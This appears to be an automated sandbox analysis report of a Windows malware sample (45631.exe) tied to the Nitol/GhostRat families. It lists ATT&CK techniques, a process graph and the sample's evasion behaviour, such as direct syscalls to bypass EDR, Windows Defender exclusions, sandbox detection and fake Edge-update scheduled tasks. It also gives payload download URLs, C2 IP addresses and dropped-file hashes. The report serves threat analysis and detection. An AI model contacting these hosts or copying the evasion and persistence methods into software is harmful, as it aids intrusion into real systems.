              Access Token Manipulation
              2
              Obfuscated Files or Information
              Security Account Manager223
              System Information Discovery
              SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts12
              Service Execution
              1
              Registry Run Keys / Startup Folder
              33
              Windows Service
              1
              Software Packing
              NTDS331
              Security Software Discovery
              Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
              Process Injection
              1
              DLL Side-Loading
              LSA Secrets1
              Process Discovery
              SSHKeylogging3
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
              Scheduled Task/Job
              32
              Masquerading
              Cached Domain Credentials11
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
              Registry Run Keys / Startup Folder
              1
              Modify Registry
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
              Virtualization/Sandbox Evasion
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Access Token Manipulation
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
              Process Injection
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583301 Sample: 45631.exe Startdate: 02/01/2025 Architecture: WINDOWS Score: 100 75 ynyeqf.net 2->75 77 sc-2cuv.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com 2->77 79 5 other IPs or domains 2->79 87 Suricata IDS alerts for network traffic 2->87 89 Malicious sample detected (through community Yara rule) 2->89 91 Antivirus detection for dropped file 2->91 93 10 other signatures 2->93 9 sgH8Ps.exe 25 2->9         started        14 45631.exe 1 24 2->14         started        16 sgH8Ps.exe 2->16         started        18 9 other processes 2->18 signatures3 process4 dnsIp5 83 sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com 118.178.60.9, 443, 49991, 49992 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 9->83 63 C:\Program Files (x86)\Twhtlb\tbcore3U.dll, PE32 9->63 dropped 65 C:\Program Files (x86)\Twhtlb\Twhtlb.exe, PE32 9->65 dropped 67 C:\Users\Public\Music\destopbak.ini, MIPSEB 9->67 dropped 107 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 9->107 109 Found direct / indirect Syscall (likely to bypass EDR) 9->109 20 Twhtlb.exe 4 5 9->20         started        25 cmd.exe 1 9->25         started        27 cmd.exe 1 9->27         started        35 2 other processes 9->35 85 sc-2cuv.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com 39.103.20.59, 443, 49946, 49957 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 14->85 69 C:\Windows\System32\drivers\189atohci.sys, PE32+ 14->69 dropped 71 C:\Users\user\Documents\vselog.dll, PE32+ 14->71 dropped 73 C:\Users\user\Documents\sgH8Ps.exe, PE32+ 14->73 dropped 111 Drops PE files to the document folder of the user 14->111 113 Sample is not signed and drops a device driver 14->113 115 Tries to detect virtualization through RDTSC time measurements 14->115 117 Uses cmd line tools excessively to alter registry or file data 18->117 29 reg.exe 1 1 18->29         started        31 reg.exe 1 1 18->31         started        33 reg.exe 1 1 18->33         started        37 5 other processes 18->37 file6 signatures7 process8 dnsIp9 81 8.217.152.240, 49999, 8917 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 20->81 59 C:\Program Files (x86)\K5YQV85\tbcore3U.dll, PE32 20->59 dropped 61 C:\Program Files (x86)\K5YQV85\6WWeC.exe, PE32 20->61 dropped 95 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 20->95 97 Creates an undocumented autostart registry key 20->97 99 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 20->99 39 cmd.exe 20->39         started        101 Uses cmd line tools excessively to alter registry or file data 25->101 103 Uses schtasks.exe or at.exe to add and modify task schedules 25->103 41 conhost.exe 25->41         started        43 schtasks.exe 1 25->43         started        51 2 other processes 25->51 45 conhost.exe 27->45         started        53 3 other processes 27->53 105 Adds extensions / path to Windows Defender exclusion list (Registry) 29->105 47 conhost.exe 35->47         started        49 conhost.exe 35->49         started        55 6 other processes 35->55 file10 signatures11 process12 process13 57 conhost.exe 39->57         started       

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              45631.exe38%VirustotalBrowse
              45631.exe29%ReversingLabs
              45631.exe100%AviraHEUR/AGEN.1311196
              SourceDetectionScannerLabelLink
              C:\Program Files (x86)\K5YQV85\tbcore3U.dll100%AviraTR/Redcap.vdzex
              C:\Program Files (x86)\Twhtlb\tbcore3U.dll100%AviraTR/Redcap.vdzex
              C:\Program Files (x86)\K5YQV85\tbcore3U.dll100%Joe Sandbox ML
              C:\Program Files (x86)\Twhtlb\tbcore3U.dll100%Joe Sandbox ML
              C:\Program Files (x86)\K5YQV85\6WWeC.exe0%ReversingLabs
              C:\Program Files (x86)\Twhtlb\Twhtlb.exe0%ReversingLabs
              C:\Users\Public\Music\destopbak.ini0%ReversingLabs
              C:\Users\user\Documents\sgH8Ps.exe0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://%s/%d.dll0%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gifa0%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/s.jpg0%Avira URL Cloudsafe
              https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg0%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/##ry2ihs.oss-cn-beijing.aliyuncs.com0%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/zF0%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif0%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gifhttps://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gifhttp0%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/s.dat0%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gif0%Avira URL Cloudsafe
              http://%s/%d.dllC:0%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/d.gif0%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/hF0%Avira URL Cloudsafe
              http://%s/upx.rarC:0%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif.i0%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif(i0%Avira URL Cloudsafe
              http://%s/ip.txtC:0%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/0%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-10030%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/7-2476756634-10030%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gifoss-enq0%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gif1i0%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/RF0%Avira URL Cloudsafe
              http://%s/ip.txt0%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif9i0%Avira URL Cloudsafe
              https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg0%Avira URL Cloudsafe
              https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg0%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif-0%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif5i0%Avira URL Cloudsafe
              https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg0%Avira URL Cloudsafe
              http://%s/upx.rar0%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/c.gif0%Avira URL Cloudsafe
              https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg0%Avira URL Cloudsafe
              https://ry2ihs.oss-cn-beijing.aliyuncs.com/i.dat0%Avira URL Cloudsafe
              https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com
              118.178.60.9
              truefalse
                unknown
                sc-2cuv.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com
                39.103.20.59
                truefalse
                  high
                  ry2ihs.oss-cn-beijing.aliyuncs.com
                  unknown
                  unknownfalse
                    unknown
                    ynyeqf.net
                    unknown
                    unknownfalse
                      unknown
                      22mm.oss-cn-hangzhou.aliyuncs.com
                      unknown
                      unknownfalse
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.giffalse
                        • Avira URL Cloud: safe
                        unknown
                        https://ry2ihs.oss-cn-beijing.aliyuncs.com/s.jpgfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpgfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://ry2ihs.oss-cn-beijing.aliyuncs.com/s.datfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.giffalse
                        • Avira URL Cloud: safe
                        unknown
                        https://ry2ihs.oss-cn-beijing.aliyuncs.com/d.giffalse
                        • Avira URL Cloud: safe
                        unknown
                        https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpgfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://ry2ihs.oss-cn-beijing.aliyuncs.com/c.giffalse
                        • Avira URL Cloud: safe
                        unknown
                        https://ry2ihs.oss-cn-beijing.aliyuncs.com/i.datfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://22mm.oss-cn-hangzhou.aliyuncs.com/f.datfalse
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://%s/%d.dllTwhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://ry2ihs.oss-cn-beijing.aliyuncs.com/zF45631.exe, 00000000.00000003.2575241713.000000000062C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://microsoft.co45631.exe, 00000000.00000003.2575138249.000000000067E000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.000000000067E000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gifa45631.exe, 00000000.00000003.2575138249.000000000067E000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.000000000067E000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gifhttps://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gifhttp45631.exe, 00000000.00000003.2622164187.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.0000000000652000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575138249.0000000000652000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://ocsp.thawte.com0189atohci.sys.0.dr, sgH8Ps.exe.0.drfalse
                            high
                            https://ry2ihs.oss-cn-beijing.aliyuncs.com/##ry2ihs.oss-cn-beijing.aliyuncs.com45631.exe, 00000000.00000003.2575138249.000000000067E000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://%s/%d.dllC:Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.symauth.com/cps0(sgH8Ps.exe.0.drfalse
                              high
                              https://ry2ihs.oss-cn-beijing.aliyuncs.com/hF45631.exe, 00000000.00000003.2575241713.000000000062C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif.i45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://%s/upx.rarC:Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://ry2ihs.oss-cn-beijing.aliyuncs.com/45631.exe, 00000000.00000003.2622164187.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.0000000000657000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575241713.000000000062C000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575138249.0000000000657000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif(i45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://ry2ihs.oss-cn-beijing.aliyuncs.com/7-2476756634-100345631.exe, 00000000.00000003.2575138249.0000000000657000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://ry2ihs.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-100345631.exe, 00000000.00000003.2622164187.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.0000000000657000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575138249.0000000000657000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://%s/ip.txtC:Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://crl.thawte.com/ThawteTimestampingCA.crl0189atohci.sys.0.dr, sgH8Ps.exe.0.drfalse
                                high
                                http://www.symauth.com/rpa00sgH8Ps.exe.0.drfalse
                                  high
                                  https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gif1i45631.exe, 00000000.00000003.2598868327.000000000067E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gifoss-enq45631.exe, 00000000.00000003.2575138249.000000000067E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif-45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif9i45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://%s/ip.txtTwhtlb.exe, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ry2ihs.oss-cn-beijing.aliyuncs.com/RF45631.exe, 00000000.00000003.2575241713.000000000062C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif5i45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://%s/upx.rarTwhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  118.178.60.9
                                  sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                                  37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                  8.217.152.240
                                  unknownSingapore
                                  45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                  39.103.20.59
                                  sc-2cuv.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                                  37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1583301
                                  Start date and time:2025-01-02 12:12:28 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 9m 31s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Run name:Run with higher sleep bypass
                                  Number of analysed new started processes analysed:48
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:45631.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@65/29@8/3
                                  EGA Information:
                                  • Successful, ratio: 66.7%
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target Twhtlb.exe, PID 3744 because there are no executed function
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  TimeTypeDescription
                                  12:14:22Task SchedulerRun new task: L1tAL path: C:\Users\user\Documents\sgH8Ps.exe
                                  12:15:51Task SchedulerRun new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 DQhZS path: C:\Program Files (x86)\Twhtlb\Twhtlb.exe
                                  12:15:51Task SchedulerRun new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 MulET path: C:\Program Files (x86)\K5YQV85\6WWeC.exe
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  118.178.60.90000000000000000.exeGet hashmaliciousNitolBrowse
                                    T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com0000000000000000.exeGet hashmaliciousNitolBrowse
                                      • 118.178.60.9
                                      T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                      • 118.178.60.9
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdHilix.m68k.elfGet hashmaliciousMiraiBrowse
                                      • 8.155.218.222
                                      1735021454574.exeGet hashmaliciousUnknownBrowse
                                      • 120.78.149.238
                                      1734098836319.exeGet hashmaliciousBlackMoonBrowse
                                      • 39.103.20.61
                                      armv4l.elfGet hashmaliciousUnknownBrowse
                                      • 59.82.127.195
                                      armv6l.elfGet hashmaliciousUnknownBrowse
                                      • 39.106.221.219
                                      DF2.exeGet hashmaliciousUnknownBrowse
                                      • 59.110.52.4
                                      loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                      • 121.198.26.154
                                      loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                      • 47.103.186.206
                                      loligang.spc.elfGet hashmaliciousMiraiBrowse
                                      • 8.130.21.60
                                      CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdHilix.m68k.elfGet hashmaliciousMiraiBrowse
                                      • 8.155.218.222
                                      1735021454574.exeGet hashmaliciousUnknownBrowse
                                      • 120.78.149.238
                                      1734098836319.exeGet hashmaliciousBlackMoonBrowse
                                      • 39.103.20.61
                                      armv4l.elfGet hashmaliciousUnknownBrowse
                                      • 59.82.127.195
                                      armv6l.elfGet hashmaliciousUnknownBrowse
                                      • 39.106.221.219
                                      DF2.exeGet hashmaliciousUnknownBrowse
                                      • 59.110.52.4
                                      loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                      • 121.198.26.154
                                      loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                      • 47.103.186.206
                                      loligang.spc.elfGet hashmaliciousMiraiBrowse
                                      • 8.130.21.60
                                      CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCHilix.mpsl.elfGet hashmaliciousMiraiBrowse
                                      • 8.208.198.92
                                      0000000000000000.exeGet hashmaliciousNitolBrowse
                                      • 8.217.35.192
                                      x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 8.211.209.238
                                      letsVPN.exeGet hashmaliciousUnknownBrowse
                                      • 8.223.56.120
                                      letsVPN.exeGet hashmaliciousUnknownBrowse
                                      • 8.223.56.120
                                      T1#U52a9#U624b1.0.1.exeGet hashmaliciousUnknownBrowse
                                      • 8.212.101.195
                                      T1#U52a9#U624b1.0.1.exeGet hashmaliciousUnknownBrowse
                                      • 8.212.101.195
                                      wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                      • 149.129.12.34
                                      V2clgnyM2J.exeGet hashmaliciousGhostRatBrowse
                                      • 8.218.163.85
                                      test5.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                      • 47.90.135.102
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      37f463bf4616ecd445d4a1937da06e191734098836319.exeGet hashmaliciousBlackMoonBrowse
                                      • 39.103.20.59
                                      • 118.178.60.9
                                      ETVk1yP43q.exeGet hashmaliciousAZORultBrowse
                                      • 39.103.20.59
                                      • 118.178.60.9
                                      16oApcahEa.exeGet hashmaliciousBabuk, DjvuBrowse
                                      • 39.103.20.59
                                      • 118.178.60.9
                                      6a7e35.msiGet hashmaliciousUnknownBrowse
                                      • 39.103.20.59
                                      • 118.178.60.9
                                      ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
                                      • 39.103.20.59
                                      • 118.178.60.9
                                      OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                      • 39.103.20.59
                                      • 118.178.60.9
                                      OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                      • 39.103.20.59
                                      • 118.178.60.9
                                      0000000000000000.exeGet hashmaliciousNitolBrowse
                                      • 39.103.20.59
                                      • 118.178.60.9
                                      0000000000000000.exeGet hashmaliciousUnknownBrowse
                                      • 39.103.20.59
                                      • 118.178.60.9
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Program Files (x86)\K5YQV85\6WWeC.exe0000000000000000.exeGet hashmaliciousNitolBrowse
                                        T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                          setup.ic19.exeGet hashmaliciousGhostRat, NitolBrowse
                                            C:\Program Files (x86)\Twhtlb\Twhtlb.exe0000000000000000.exeGet hashmaliciousNitolBrowse
                                              T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                                setup.ic19.exeGet hashmaliciousGhostRat, NitolBrowse
                                                  Process:C:\Program Files (x86)\Twhtlb\Twhtlb.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):54152
                                                  Entropy (8bit):6.64786972992462
                                                  Encrypted:false
                                                  SSDEEP:768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
                                                  MD5:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                  SHA1:E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
                                                  SHA-256:7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                                                  SHA-512:E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Joe Sandbox View:
                                                  • Filename: 0000000000000000.exe, Detection: malicious, Browse
                                                  • Filename: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                                                  • Filename: setup.ic19.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Twhtlb\Twhtlb.exe
                                                  File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):5059989
                                                  Entropy (8bit):7.999955228974415
                                                  Encrypted:true
                                                  SSDEEP:98304:0OQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:zo6T1MFhE/7qJwBP6TWtttriYE7kjv
                                                  MD5:44488644EA5EE02A9701A8B070AC631D
                                                  SHA1:168A3E17F7E5CF88C99C06718A419374C5131176
                                                  SHA-256:E8376791140227FB7081204DA98DB8B854B128AF2D0D5699028756BD385ECC7B
